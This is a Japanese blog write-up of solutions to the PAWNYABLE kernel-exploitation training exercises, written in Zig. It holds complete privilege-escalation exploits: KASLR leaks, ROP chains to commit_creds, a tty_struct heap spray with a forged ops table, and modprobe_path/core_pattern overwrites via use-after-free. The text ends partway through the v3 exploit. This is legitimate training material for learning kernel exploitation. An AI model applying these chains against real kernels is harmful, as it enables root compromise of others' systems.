2025-07-30
       Tags: pwn
       
       Table of Contents
       
           - v1: Stack Overflow
           - v2: Heap Overflow
           - v3: Use after Free
           - v4: Race Condition
           - userfaultfd
           - FUSE
           - CVE-2021-3490
       
       ptr-yudaiさんのPAWNYABLE [1]を解いてみた。
       以下の解法は複雑で、しかも説明は詳しくないかもしれないから、参考以外を利用するには多分難しいだろう。
       PAWNYABLEは実にいい資料だから、pwnを学びたいなら、このページを閉じて、そちらに練習してください。
       
       僕の日本語は下手くそ[^fn:1]だが、それでも書く練習したいと思っている。
       それと、pwnにZigを使うことは非常に便利ですが(ま、Cよりも)、ですが資料が存在しないらしい。
       
       == Holstein
       
       
       === v1: Stack Overflow
       
       
       さて、どの緩和策は有効をチェックしよう。
       pwn checksec vuln.ko 2>&1
       [*] './src/vuln.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       cat /proc/cpuinfo | grep -q -e 'smep.*smap' && echo 'SMEP/SMAP enabled'
       cat /sys/devices/system/cpu/vulnerabilities/meltdown | grep -q -e 'PTI' && echo 'KPTI enabled'
       cat /proc/cmdline | grep -q -e 'nokaslr' || echo 'KASLR enabled'
       SMEP/SMAP enabled
       KPTI enabled
       KASLR enabled
       
       FGKASLRもチェックしよう:
       cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
       ffffffff99200000 T startup_64
       ffffffff99200040 T secondary_startup_64
       ffffffff99200045 T secondary_startup_64_no_verify
       ffffffff99200230 T __startup_64
       ffffffff992005e0 T startup_64_setup_env
       ffffffff9926e240 T prepare_kernel_cred
       ffffffff9926e390 T commit_creds
       ffffffff99a00e10 T swapgs_restore_regs_and_return_to_usermode
       # reboot and run again
       cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
       ffffffffb7600000 T startup_64
       ffffffffb7600040 T secondary_startup_64
       ffffffffb7600045 T secondary_startup_64_no_verify
       ffffffffb7600230 T __startup_64
       ffffffffb76005e0 T startup_64_setup_env
       ffffffffb766e240 T prepare_kernel_cred
       ffffffffb766e390 T commit_creds
       ffffffffb7e00e10 T swapgs_restore_regs_and_return_to_usermode
       
       まず、KASLRを回避するてめに、アドレスリークが必要だ。
       const std = @import("std");
       
       pub fn main() !void {
           const fd = try std.posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer std.posix.close(fd);
       
           var buf: [0x400 + 32]u8 = undefined;
           const bytes_read = try std.posix.read(fd, &buf);
           std.debug.dumpHex(buf[0..bytes_read]);
       }
       ffffffffa0a00000 T startup_64
       ffffffffa0a00000 T _stext
       ffffffffa0a00000 T _text
       ffffffffa0a00040 T secondary_startup_64
       ffffffffa0a00045 T secondary_startup_64_no_verify
       ffffffffa0a00110 t verify_cpu
       ffffffffa0a00210 T sev_verify_cbit
       ffffffffa0a00220 T start_cpu0
       ffffffffa0a00230 T __startup_64
       ffffffffa0a005e0 T startup_64_setup_env
       00007ffdcedd8528  06 00 00 00 04 00 00 00  40 00 00 00 00 00 00 00  ........@.......
       00007ffdcedd8538  40 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  @.......@.......
       00007ffdcedd8548  68 02 00 00 00 00 00 00  68 02 00 00 00 00 00 00  h.......h.......
       00007ffdcedd8558  08 00 00 00 00 00 00 00  03 00 00 00 04 00 00 00  ................
       00007ffdcedd8568  A8 02 00 00 00 00 00 00  A8 02 00 00 00 00 00 00  ................
       00007ffdcedd8578  A8 02 00 00 00 00 00 00  16 00 00 00 00 00 00 00  ................
       00007ffdcedd8588  16 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  ................
       00007ffdcedd8598  01 00 00 00 04 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd85a8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd85b8  50 AA 00 00 00 00 00 00  50 AA 00 00 00 00 00 00  P.......P.......
       00007ffdcedd85c8  00 10 00 00 00 00 00 00  01 00 00 00 05 00 00 00  ................
       00007ffdcedd85d8  00 B0 00 00 00 00 00 00  00 B0 00 00 00 00 00 00  ................
       00007ffdcedd85e8  00 B0 00 00 00 00 00 00  A4 FF 07 00 00 00 00 00  ................
       00007ffdcedd85f8  A4 FF 07 00 00 00 00 00  00 10 00 00 00 00 00 00  ................
       00007ffdcedd8608  01 00 00 00 04 00 00 00  00 B0 08 00 00 00 00 00  ................
       00007ffdcedd8618  00 B0 08 00 00 00 00 00  00 B0 08 00 00 00 00 00  ................
       00007ffdcedd8628  DC 68 02 00 00 00 00 00  DC 68 02 00 00 00 00 00  .h.......h......
       00007ffdcedd8638  00 10 00 00 00 00 00 00  01 00 00 00 06 00 00 00  ................
       00007ffdcedd8648  20 22 0B 00 00 00 00 00  20 32 0B 00 00 00 00 00   "...... 2......
       00007ffdcedd8658  20 32 0B 00 00 00 00 00  03 2E 00 00 00 00 00 00   2..............
       00007ffdcedd8668  70 35 00 00 00 00 00 00  00 10 00 00 00 00 00 00  p5..............
       00007ffdcedd8678  02 00 00 00 06 00 00 00  90 43 0B 00 00 00 00 00  .........C......
       00007ffdcedd8688  90 53 0B 00 00 00 00 00  90 53 0B 00 00 00 00 00  .S.......S......
       00007ffdcedd8698  90 01 00 00 00 00 00 00  90 01 00 00 00 00 00 00  ................
       00007ffdcedd86a8  08 00 00 00 00 00 00 00  04 00 00 00 04 00 00 00  ................
       00007ffdcedd86b8  C0 02 00 00 00 00 00 00  C0 02 00 00 00 00 00 00  ................
       00007ffdcedd86c8  C0 02 00 00 00 00 00 00  30 00 00 00 00 00 00 00  ........0.......
       00007ffdcedd86d8  30 00 00 00 00 00 00 00  08 00 00 00 00 00 00 00  0...............
       00007ffdcedd86e8  53 E5 74 64 04 00 00 00  C0 02 00 00 00 00 00 00  S.td............
       00007ffdcedd86f8  C0 02 00 00 00 00 00 00  C0 02 00 00 00 00 00 00  ................
       00007ffdcedd8708  30 00 00 00 00 00 00 00  30 00 00 00 00 00 00 00  0.......0.......
       00007ffdcedd8718  08 00 00 00 00 00 00 00  51 E5 74 64 06 00 00 00  ........Q.td....
       00007ffdcedd8728  00 2C 3B 03 8C 9B FF FF  00 00 00 00 00 00 00 00  .,;.............
       00007ffdcedd8738  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8748  00 00 00 00 00 00 00 00  10 00 00 00 00 00 00 00  ................
       00007ffdcedd8758  52 E5 74 64 04 00 00 00  20 22 0B 00 00 00 00 00  R.td.... "......
       00007ffdcedd8768  20 32 0B 00 00 00 00 00  20 32 0B 00 00 00 00 00   2...... 2......
       00007ffdcedd8778  E0 2D 00 00 00 00 00 00  E0 2D 00 00 00 00 00 00  .-.......-......
       00007ffdcedd8788  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8798  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87a8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87b8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87c8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87d8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87e8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87f8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8808  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8818  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8828  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8838  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8848  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8858  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8868  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8878  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8888  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8898  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88a8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88b8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88c8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88d8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88e8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88f8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8908  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8918  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8928  E8 7E 54 80 04 B2 FF FF  3C D3 B3 A0 FF FF FF FF  .~T.....<.......
       00007ffdcedd8938  87 CD B4 A0 01 00 00 00  00 8A 6B 02 8C 9B FF FF  ..........k.....
       
       `buf[0x408..][0..8]`​はカーネルのポインタが似てそう。
       何回を動かすでも、このアドレスはカーネルのベースアドレスからのオフセットは固定(差は​`0x13d33c`​)。
       
       狙いはroot権限昇格なので、ROPchainで​`commit_creds(prepare_kernel_cre
       d(NULL))`​を呼びしよう。
       ropr --nosys --nojop -R '^(pop rdi;|pop rcx;|mov rsi, rax;.*|add rdi, rsi;.*) ret;' vmlinux
       0xffffffff81049576: add rdi, rsi; add r8, rdi; mov rax, r8; ret;
       0xffffffff810a714a: mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
       0xffffffff81c9480d: pop rcx; ret;
       0xffffffff81cc6e66: pop rdi; ret;
       0xffffffff81f1f0e9: pop rdi; ret;
       0xffffffff81f496b1: add rdi, rsi; mov [rdi], rdx; mov [rdi+8], rcx; mov [rdi+0x10], r8d; ret;
       var POP_RDI: u64 = 0xffffffff811f61fd;
       var POP_RCX: u64 = 0xffffffff8146ee3c;
       var ADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8: u64 = 0xffffffff81049576;
       var MOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8: u64 = 0xffffffff810a714a;
       
       var KPTI_TRAMPOLINE: u64 = 0xffffffff81800e10+22;
       var PREPARE_KERNEL_CRED: u64 = 0xffffffff8106e240;
       var COMMIT_CREDS: u64 = 0xffffffff8106e390;
       
       fn ropchain(fd: posix.fd_t) !void {
           const file = (std.fs.File{ .handle = fd }).writer();
           var bw = std.io.bufferedWriter(file);
           const writer = bw.writer();
       
           try writer.writeByteNTimes('A', 0x400+8);
           try writer.writeAll(std.mem.asBytes(&[_]u64{
               POP_RDI,
               0,
               PREPARE_KERNEL_CRED,
               POP_RDI,
               0,
               POP_RCX,
               0, // make sub rsi, rcx a nop
               MOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8,
               ADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8,
               COMMIT_CREDS,
       
               KPTI_TRAMPOLINE,
               0, // junk
               0, // junk
               @intFromPtr(&ret2win),
               user_cs,
               user_rflags,
               user_rsp,
               user_ss,
           }));
       
           try bw.flush();
           unreachable;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &POP_RDI,
               &POP_RCX,
               &ADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8,
               &MOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8,
       
               &KPTI_TRAMPOLINE,
               &PREPARE_KERNEL_CRED,
               &COMMIT_CREDS,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       <<pawnyable-lib>>
       <<lk01-1-ropchain>>
       
       fn ret2win() noreturn {
           std.log.info("You won!!", .{});
       
           const args = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
           const env = [_:null]?[*:0]u8{};
           switch (posix.execveZ("/usr/bin/whoami", args[0..args.len], env[0..env.len])) {
               else => unreachable,
           }
           unreachable;
       }
       
       fn leakBaseAddress(fd: posix.fd_t) !u64 {
           var buf: [0x408+8]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[0x408..]).*;
           return ret - 0x13d33c;
       }
       
       pub fn main() !void {
           catchSigsegv(&whoami);
           saveState();
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           const kernel_base = try leakBaseAddress(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&kernel_base)), .lower)});
           adjust_offsets(kernel_base-0xffffffff81000000);
       
           try ropchain(fd);
           unreachable;
       }
       whoami
       ./exploit
       whoami: unknown uid 1337
       [INFO] Kernel base: 0xffffffff81000000
       [INFO] You won!!
       root
       
 (DIR) 完全なエクスプロイト
       
       何故かよく分からないが、​`ret2win`​をジャンプした後で​`SIGSEGV`
       ​を受け取ってしまった。
       `swapgs_restore_regs_and_return_to_usermode`​はこ
       の状況を避けるはずだったが、易きに付くことをしまし、そして​`sigaction`​でまた​
       [40m`ret2win`​呼んでいた。
       
       === v2: Heap Overflow
       
       10c10
       < MODULE_DESCRIPTION("Holstein v1 - Vulnerable Kernel Driver for Pawnyable");
       ---
       > MODULE_DESCRIPTION("Holstein v2 - Vulnerable Kernel Driver for Pawnyable");
       31,32c31,32
       <                         char __user *buf, size_t count,
       <                         loff_t *f_pos)
       ---
       >                            char __user *buf, size_t count,
       >                            loff_t *f_pos)
       34,35d33
       <   char kbuf[BUFFER_SIZE] = { 0 };
       <
       38,39c36
       <   memcpy(kbuf, g_buf, BUFFER_SIZE);
       <   if (_copy_to_user(buf, kbuf, count)) {
       ---
       >   if (copy_to_user(buf, g_buf, count)) {
       51,52d47
       <   char kbuf[BUFFER_SIZE] = { 0 };
       <
       55c50
       <   if (_copy_from_user(kbuf, buf, count)) {
       ---
       >   if (copy_from_user(g_buf, buf, count)) {
       59d53
       <   memcpy(g_buf, kbuf, BUFFER_SIZE);
       
       今回はヒープ攻撃。
       スタック上でのデータをリークしたり、リターンアドレスを書き換えたりすることはできない。
       だが問題ない⸺カーネル構造体をきちんと上書きすれば、権限昇格ができる。
       
       ヒープオーバーフローが​`g_buf`​の後ろに書き込むができるが、どうやって構造体を必ず直後
       に隣り合うように配置できる?
       ヒープスプレーを使えば簡単だ。複数の構造体を確保すると、​`g_buf`​にあるスラブは構造体
       を配置する、結果的に​`g_buf`​の直後に構造体がある可能性が高い。
       fn spray(fds: []posix.fd_t) !void {
           for (0..fds.len) |i| {
               fds[i] = try posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660);
           }
       }
       
       SLUB(カーネルのヒープ確保ルーチン)はslab確保ルーチンなので、同じくらいサイズの構造体を同じslabに配置する。
       なので、約​`0x400`​バイトの構造体は必要。
       
         Table 1:
         SLUBの様々のサイズ帯pwnに使えるカーネル構造体 (出典 [2])
       
       |            Generic            Cache            |           Object
       |
       |---------------|--------------------------------------------------
       |     kmalloc-8        |    pcifilpprivate    signalfd_ctx
       |
       |      kmalloc-16          |      afsfile       aarevision
       |
       | kmalloc-32    | vmcihostdev seqoperations (cg cache)
       codafileinfo shmfile_data |
       | kmalloc-64     | sndinfoprivatedata sndctl_file
       |
       | kmalloc-96    | subprocessinfo watchqueue vfio_container
       |
       |           kmalloc-128             |          dlmuserproc
       |
       |    kmalloc-192      |    loopbackpcm    sndtimeruser
       ppstruct                                |
       | kmalloc-256    | vhcidata sndcomprfile msgqueue
       (cg cache)                        |
       |     kmalloc-512      |     tlscontext     mousedevclient
       (`input` group)                          |
       | kmalloc-1024  | pipebuffer ttystruct sock xfrmpolicy
       nouveaucli                  |
       | kmalloc-2048  |  superblock perfevent (SELinux disabled)
       |
       |              kmalloc-4096               |              net_device
       |
       
       `tty_struct`[^fn:2],
       [^fn:3]は特に便利だね;​`const struct tty_operations *ops`[
       49m​を制御できれば、そのttyで​`koioctl`​[^fn:4]を呼び出すでき、ACE
       (Arbitrary Code Execution)ができる。
       また、ヒープのアドレスをリークすることができる。
       
       後は2種類のリクが必要:カーネルアドレス(ROP  gadgetのアドレスを計算為)とヒープアドレス(悪用の​`struct
       tty_operations *ops`​のアドレスを分かり為)。
       const std = @import("std");
       
       <<heap-spray>>
       
       pub fn main() !void {
           var ttys: [100]posix.fd_t = undefined;
           defer for (ttys) |tty| posix.close(tty);
           try spray(ttys[0..50]);
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           try spray(ttys[50..]);
       
           var buf: [0x400+0x100]u8 = [_]u8{'A'}**0x400 ++ [_]u8{0}**0x100;
           const bytes_read = try posix.read(fd, &buf);
           std.debug.dumpHex(buf[0x400..bytes_read]);
       }
       00007ffed91dc3f8  01 54 00 00 01 00 00 00  00 00 00 00 00 00 00 00  .T..............
       00007ffed91dc408  00 50 D3 02 80 88 FF FF  80 88 C3 81 FF FF FF FF  .P..............
       00007ffed91dc418  32 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  2...............
       00007ffed91dc428  00 00 00 00 00 00 00 00  38 58 0D 03 80 88 FF FF  ........8X␍.....
       00007ffed91dc438  38 58 0D 03 80 88 FF FF  48 58 0D 03 80 88 FF FF  8X␍.....HX␍.....
       00007ffed91dc448  48 58 0D 03 80 88 FF FF  70 7D 73 02 80 88 FF FF  HX␍.....p}s.....
       00007ffed91dc458  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc468  70 58 0D 03 80 88 FF FF  70 58 0D 03 80 88 FF FF  pX␍.....pX␍.....
       00007ffed91dc478  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc488  90 58 0D 03 80 88 FF FF  90 58 0D 03 80 88 FF FF  .X␍......X␍.....
       00007ffed91dc498  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc4a8  B0 58 0D 03 80 88 FF FF  B0 58 0D 03 80 88 FF FF  .X␍......X␍.....
       00007ffed91dc4b8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc4c8  00 00 00 00 00 00 00 00  D8 58 0D 03 80 88 FF FF  .........X␍.....
       00007ffed91dc4d8  D8 58 0D 03 80 88 FF FF  00 00 00 00 00 00 00 00  .X␍.............
       00007ffed91dc4e8  00 00 00 00 00 00 00 00  F8 58 0D 03 80 88 FF FF  .........X␍.....
       
       なんと、​`tty_struct`​には両方のリクがある!
       確かに便利ね。
       通常の​`tty_struct`​なら​`ops`​の
       値はptmx_fops [3]のアドレス(このvmlinuxでは​`0xffffffff81c38880`​)、そ
       して​`ldisc_sem.read_wait`​の値は​`tty_str
       uct`​のアドレス.
       // as of 5.10.7
       const tty_struct = extern struct {
           const ld_semaphore = extern struct {
               const list_head = extern struct {
                   next: usize = 0xdeadbeefdeadbeef,
                   prev: usize = 0xcafebabecafebabe,
               };
       
               count: u64 = 0,
               wait_lock: i32 = 0,
               wait_readers: i32 = 0,
               read_wait: list_head = .{},
               write_wait: list_head = .{},
           };
       
           magic: i32 = 0x5401,
           kref: i32 = 0,
           dev: usize = 0,
           driver: usize, // must be a valid heap address
           ops: usize,
           index: i32 = 0,
           ldisc_sem: ld_semaphore = .{},
           // don't care about the rest
       
           pub fn init(ops_table: usize) tty_struct {
               // ops_table must live on the heap
               return .{
                   .driver = ops_table,
                   .ops = ops_table,
                   .ldisc_sem = .{
                       .read_wait = .{ .next = ops_table, .prev = ops_table },
                       .write_wait = .{ .next = ops_table, .prev = ops_table },
                   },
               };
           }
       };
       const tty_operations = extern struct {
           lookup: usize = 0,
           install: usize = 0,
           remove: usize = 0,
           open: usize = 0,
           close: usize = 0,
           shutdown: usize = 0,
           cleanup: usize = 0,
           write: usize = 0,
           put_char: usize = 0,
           flush_chars: usize = 0,
           write_room: usize = 0,
           chars_in_buffer: usize = 0,
           ioctl: usize,
       };
       fn leakKASLROffset(fd: posix.fd_t) !u64 {
           const ptmx_fops_addr: u64 = 0xffffffff81c38880;
       
           var buf: [0x400+@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - ptmx_fops_addr;
       }
       
       fn leakGBuf(fd: posix.fd_t) !u64 {
           const offset = comptime blk: {
               const ld_semaphore = @FieldType(tty_struct, "ldisc_sem");
               break :blk @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(ld_semaphore, "read_wait") + @sizeOf(@typeInfo(@FieldType(ld_semaphore, "read_wait")).@"struct".fields[0].type);
           };
           var buf: [0x400+offset]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - (buf.len-8);
       }
       
       ROPしたいから、悪質の​`tty_operations`​の​`ioct
       l`​の値はスタックピボットのアドレスに読み込んでる。
       
       それと、​`ioctl`​を読んでる時に幾つかのレジースタは管理できるから、第二引数はROPc
       hainのアドレスにする(こう:​`for (ttys) |tty| _ = std.os.linux.ioctl(tty,
       0xdeadbeef, ropchain_addr);`)。
       fn posionTTYStruct(fd: posix.fd_t, g_buf_addr: u64) !void {
           const file = (std.fs.File{ .handle = fd }).writer();
           var bw = std.io.bufferedWriter(file);
           const writer = bw.writer();
       
           const fake_tty_ops = tty_operations{ .ioctl = PUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP };
           try writer.writeAll(std.mem.asBytes(&fake_tty_ops));
           var n_written: usize = @sizeOf(@TypeOf(fake_tty_ops));
           n_written += try ropchain(writer);
       
           try writer.writeByteNTimes('A', 0x400 - n_written);
           try writer.writeAll(std.mem.asBytes(&tty_struct{ .driver = g_buf_addr, .ops = g_buf_addr })[0..@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]);
       
           try bw.flush();
       }
       
       ROPchainの内容は​`modprobe_path`​上書きするやつだ。
       cat /proc/kallsyms | grep -e 'modprobe_path' -e 'swapgs_restore_regs_and_return_to_usermode'
       ffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode
       
       ​`CONFIG_KALLSYMS_ALL=y`​がない場合、​`modprobe_path`
       ​は​`/proc/kallsyms`​に表示されない。
       もちろんあるけど。
       from pwn import *
       vmlinux = ELF("./vmlinux")
       hex(next(vmlinux.search("/sbin/modprobe\0")))
       0xffffffff81e38180
       var PUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP: u64 = 0xffffffff813a478a; // stack pivot gadget
       
       var MOV_ADDROF_RAX_RDI: u64 = 0xffffffff8110840a;
       var POP_RAX: u64 = 0xffffffff8113dd3c;
       var POP_RDI_ADD_CL_CL: u64 = 0xffffffff81032f59;
       
       var KPTI_TRAMPOLINE: u64 = 0xffffffff81800e10+22;
       var MODPROBE_PATH: u64 = 0xffffffff81e38180;
       
       fn ropchain(writer: anytype) !usize {
           const chain = [_]u64{
               0, // junk
               0, // junk
               POP_RDI_ADD_CL_CL,
               std.mem.readInt(u64, "/tmp/x\x00\x00", .little),
               POP_RAX,
               MODPROBE_PATH,
               MOV_ADDROF_RAX_RDI,
       
               KPTI_TRAMPOLINE,
               0, // junk
               0, // junk
               @intFromPtr(&modprobePath),
               user_cs,
               user_rflags,
               user_rsp,
               user_ss,
           };
           try writer.writeAll(std.mem.asBytes(&chain));
           return std.mem.asBytes(&chain).len;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &PUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP,
       
               &MOV_ADDROF_RAX_RDI,
               &POP_RAX,
               &POP_RDI_ADD_CL_CL,
       
               &KPTI_TRAMPOLINE,
               &MODPROBE_PATH,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       
       またセグフォルートの問題が遭遇したので、​`sigaction`​を利用した。
       <<pawnyable-lib>>
       <<tty_struct>>
       <<heap-spray>>
       <<lk01-2-heap-leak>>
       <<lk01-2-heap-overflow>>
       <<lk01-2-rop>>
       
       pub fn main() !void {
           catchSigsegv(&modprobePath);
           saveState();
       
           var ttys: [100]posix.fd_t = undefined;
           defer for (ttys) |tty| posix.close(tty);
           try spray(ttys[0..50]);
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           try spray(ttys[50..]);
       
           const kaslr_offset = try leakKASLROffset(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           adjust_offsets(kaslr_offset);
       
           const g_buf = try leakGBuf(fd);
           std.log.info("g_buf located at: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&g_buf)), .lower)});
       
           try posionTTYStruct(fd, g_buf);
           const ropchain_addr = g_buf + @sizeOf(tty_operations);
       
           var buf: [10]u8 = undefined;
           _ = try posix.read(fd, &buf);
       
           for (ttys) |tty| _ = linux.ioctl(tty, 0xdeadbeef, ropchain_addr);
       }
       whoami
       ./exploit
       # execute bogus file
       /tmp/unknown &> /tmp/null # /dev/null is priviledged
       cat /tmp/whoisit
       whoami: unknown uid 1337
       [INFO] Kernel base: 0xffffffffa0800000
       [INFO] g_buf located at: 0xffff9f45c3108000
       [INFO] You won!!
       root
       
 (DIR) 完全なエクスプロイト
       
       実はスタックピボットは不要だった:AAWガジェットを利用したら結果は同じだ。
       
       他の方法
       
       core_pattern [4]読み込み
       コアダンプが発生した際、​`core_pattern`​で定義されたプログラッムが呼び出される
       。​`core_pattern`​はFGKASLR影響しを受けないらしいから、特に便利っすね。
       
        `task_struct.cred`​読み書き
       AARとAAWがあれば、ヒープ上から​`task_struct.cred`​を探し出して、それ
       を0をセットする(​`prctl`​を利用すればプロセスの名は探すやすい値を変われば楽になる)
       。
       
       === v3: Use after Free
       
       10c10
       < MODULE_DESCRIPTION("Holstein v2 - Vulnerable Kernel Driver for Pawnyable");
       ---
       > MODULE_DESCRIPTION("Holstein v3 - Vulnerable Kernel Driver for Pawnyable");
       21c21
       <   g_buf = kmalloc(BUFFER_SIZE, GFP_KERNEL);
       ---
       >   g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
       35a36,40
       >   if (count > BUFFER_SIZE) {
       >     printk(KERN_INFO "invalid buffer size\n");
       >     return -EINVAL;
       >   }
       >
       48a54,58
       >
       >   if (count > BUFFER_SIZE) {
       >     printk(KERN_INFO "invalid buffer size\n");
       >     return -EINVAL;
       >   }
       
       今回はオーバーフローがない。​`g_buf`​のUAFを悪用しよう。
       
       攻撃の作戦は:
       
       1.  2回で​`/dev/holstein`​を開く
       2.  一つのfdを閉じる
       3.  複数の​`tty_struct`​をスプレーする
       4.  別のfdで構造体のいずれかを書き換える
       from pwn import *
       vmlinux = ELF("./vmlinux")
       hex(next(vmlinux.search(b"core".ljust(128, b"\0"))))
       0xffffffff81eb12e0
       <<pawnyable-lib>>
       <<tty_struct>>
       <<heap-spray>>
       
       var MOV_ADDROF_RDX_RCX: u64 = 0xffffffff811b2d06;
       var CORE_PATTERN: u64 = 0xffffffff81eb12e0;
       
       fn leakKASLROffset(fd: posix.fd_t) !u64 {
           const ptmx_fops_addr = 0xffffffff81c39c60;
           var buf: [@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - ptmx_fops_addr;
       }
       
       fn leakHeap(fd: posix.fd_t) !u64 {
           const offset = comptime blk: {
               const ld_semaphore = @FieldType(tty_struct, "ldisc_sem");
               break :blk @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(ld_semaphore, "read_wait") + @sizeOf(@typeInfo(@FieldType(ld_semaphore, "read_wait")).@"struct".fields[0].type);
           };
           var buf: [offset]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - (buf.len-8);
       }
       
       fn aaw(fd: posix.fd_t, ttys: []posix.fd_t, g_buf_addr: u64, value: u32, address: u64) !void {
           _ = try posix.write(fd, std.mem.asBytes(&tty_struct{ .driver = g_buf_addr, .ops = g_buf_addr + @sizeOf(tty_struct), .ldisc_sem = .{ .read_wait = .{ .next = g_buf_addr...
           for (ttys) |tty| if (.SUCCESS == posix.errno(linux.ioctl(tty, value, address))) break;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &MOV_ADDROF_RDX_RCX,
               &CORE_PATTERN,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       
       pub fn main() !void {
           catchSigsegv(&corePattern);
           saveState();
       
